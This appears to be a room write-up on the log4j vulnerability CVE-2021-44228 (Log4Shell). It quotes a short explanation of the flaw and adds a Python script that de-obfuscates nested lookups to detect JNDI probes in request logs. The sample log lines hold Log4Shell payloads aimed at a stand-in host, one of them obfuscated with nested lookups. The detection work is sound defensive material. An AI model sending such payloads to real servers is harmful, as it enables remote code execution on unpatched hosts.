# Solar, Exploiting log4j

"On December 9th, 2021, the world was made aware of a new vulnerability identified as CVE-2021-44228, affecting the Java logging package **`log4j`**. This vulnerability earned a severity score of 10.0 (the most critical designation) and offers trivial remote code execution on hosts engaging with software that utilizes this **`log4j`** version. This attack has been dubbed "Log4Shell".

Today, **`log4j`** version **`2.16.0`** is available and patches this vulnerability (JNDI is fully disabled, support for Message Lookups is removed, and the new DoS vulnerability CVE-2021-45046 is not present). <https://github.com/apache/logging-log4j2/releases/tag/rel%2F2.16.0>

However, the sheer danger of this vulnerability is due to how ubiquitous the logging package is. Millions of applications as well as software providers use this package as a dependency in their own code. While you may be able to patch your own codebase using **`log4j`**, other vendors and manufacturers will still need to push their own security updates downstream. Many security researchers have likened this vulnerability to that of [Shellshock](https://en.wikipedia.org/wiki/Shellshock_\(software_bug\)) by the nature of its enormous attack surface. We will see this vulnerability for years to come."
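The quoted passage explains that the fix removed Message Lookups, the `${...}` substitution that lets a logged string reach JNDI. Until every downstream vendor ships that fix, the practical job is spotting `${jndi:...}` in request logs, and attackers rarely send it verbatim: log4j also resolves `${lower:x}`, `${upper:x}` and the default-value form `${key:-value}` (so `${::-j}` becomes `j`), and those nested lookups are used to hide the `jndi` prefix. The following detection script is an added example, not code from the original page or from the log4j project. The log lines are constructed for the example, and the set of lookup forms it normalizes is the common obfuscation set rather than log4j's complete lookup list.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample log lines (not taken from the original page).
# Lines 0 and 1 carry a plain JNDI lookup, line 2 hides it behind nested
# lookups, line 3 uses a lookup but is not a JNDI probe.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    'User-Agent: ${jndi:rmi://attacker.example:1099/x}',
    'X-Api-Version: ${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:ldap://attacker.example/b}',
    'X-Api-Version: 1.2.3 ${date:yyyy}',
]

# Matches an innermost lookup: one with no further "${" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")

# log4j lowercases the lookup prefix, so match "jndi" case-insensitively.
_JNDI = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Evaluate one innermost lookup the way an attacker relies on log4j doing it.

    Returns None for lookups we deliberately leave in place (e.g. jndi:, date:)
    so the caller can inspect them after the obfuscation layers are peeled off.
    """
    if body.startswith("::-"):        # ${::-j}: empty key, default value "j"
        return body[3:]
    if body.startswith("lower:"):     # ${lower:J} -> "j"
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):     # ${upper:n} -> "N"
        return body[len("upper:"):].upper()
    if ":-" in body:                  # ${env:NOPE:-i}: unset key falls back to "i"
        return body.split(":-", 1)[1]
    return None


def normalize(line: str, max_depth: int = 10) -> str:
    """Repeatedly resolve innermost lookups, bounded to avoid pathological nesting."""
    for _ in range(max_depth):
        changed = False

        def repl(m: "re.Match[str]") -> str:
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        line = _INNER.sub(repl, line)
        if not changed:
            break
    return line


def is_log4shell_probe(line: str) -> bool:
    """True if the line, after de-obfuscation, contains a JNDI lookup."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (index, normalized line) for every line that looks like a Log4Shell probe."""
    return [(i, normalize(l)) for i, l in enumerate(lines) if is_log4shell_probe(l)]


if __name__ == "__main__":
    for idx, shown in scan(SAMPLE_LOG_LINES):
        print(f"line {idx}: {shown}")
```

Matching the raw string `${jndi:` alone would miss line 2 entirely; normalizing first turns it into `${jNdi:ldap://attacker.example/b}`, which the case-insensitive check catches. The depth bound matters in production: a log line built from attacker input can nest lookups as deep as it likes, so a naive recursive resolver is itself a denial-of-service target.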

For a growing community-supported list of software and services vulnerable to CVE-2021-44228, check out this GitHub repository:

* <https://github.com/YfryTchsGD/Log4jAttackSurface>
